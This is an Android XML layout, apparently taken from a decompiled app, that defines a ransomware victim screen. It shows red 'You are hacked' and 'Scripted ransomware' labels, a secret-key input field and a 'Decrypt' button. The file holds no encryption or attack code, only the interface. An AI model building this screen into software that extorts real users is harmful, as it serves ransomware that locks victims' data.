<?xml version="1.0" encoding="utf-8"?>
<RelativeLayout android:background="#ff424242" android:layout_width="fill_parent" android:layout_height="fill_parent"
  xmlns:android="http://schemas.android.com/apk/res/android" xmlns:app="http://schemas.android.com/apk/res-auto">
    <Button android:textColor="#ffff0000" android:id="@id/button" android:layout_width="105.0dip" android:layout_height="wrap_content" android:layout_marginBottom="16.0dip" android:text="Decrypt" android:layout_alignRight="@id/textView3" android:layout_alignParentBottom="true" />
    <EditText android:textColor="#ffff0000" android:id="@id/editText" android:background="#ffffffff" android:layout_width="361.0dip" android:layout_height="wrap_content" android:layout_marginBottom="71.0dip" android:text="Enter your secret key here" android:ems="10" android:layout_alignParentBottom="true" android:layout_centerHorizontal="true" android:inputType="textPersonName" />
    <TextView android:textColor="#ffff0000" android:id="@id/textView3" android:background="#ffffffff" android:layout_width="244.0dip" android:layout_height="wrap_content" android:layout_marginBottom="104.0dip" android:text="TextView" android:layout_alignRight="@id/editText" android:layout_alignParentBottom="true" />
    <TextView android:textColor="#ffff0000" android:id="@id/textView4" android:layout_width="84.0dip" android:layout_height="wrap_content" android:text="Username = " android:layout_alignLeft="@id/editText" android:layout_alignBottom="@id/textView3" />
    <com.example.kico.myapplication.TypeWriter android:textSize="19.0sp" android:textColor="#ffff0000" android:id="@id/tv" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_above="@id/progressBar2" android:layout_centerInParent="true" />
    <TextView android:textSize="30.0sp" android:textColor="#ffff0000" android:id="@id/textView5" android:layout_width="217.0dip" android:layout_height="wrap_content" android:text="You are hacked" android:layout_alignParentTop="true" android:layout_alignParentRight="true" />
    <TextView android:textColor="#ffff0000" android:id="@id/textView6" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_marginRight="18.0dip" android:text="Scripted ransomware" android:layout_below="@id/textView5" android:layout_alignParentRight="true" />
    <ProgressBar android:id="@id/progressBar2" android:layout_width="30.0dip" android:layout_height="37.0dip" android:layout_above="@id/textView3" android:layout_alignRight="@id/button" style="?android:progressBarStyle" />
    <TextView android:textSize="24.0sp" android:textColor="#ffff0000" android:id="@id/textView7" android:layout_width="225.0dip" android:layout_height="wrap_content" android:text="TextView" android:layout_alignLeft="@id/editText" android:layout_alignTop="@id/button" />
</RelativeLayout>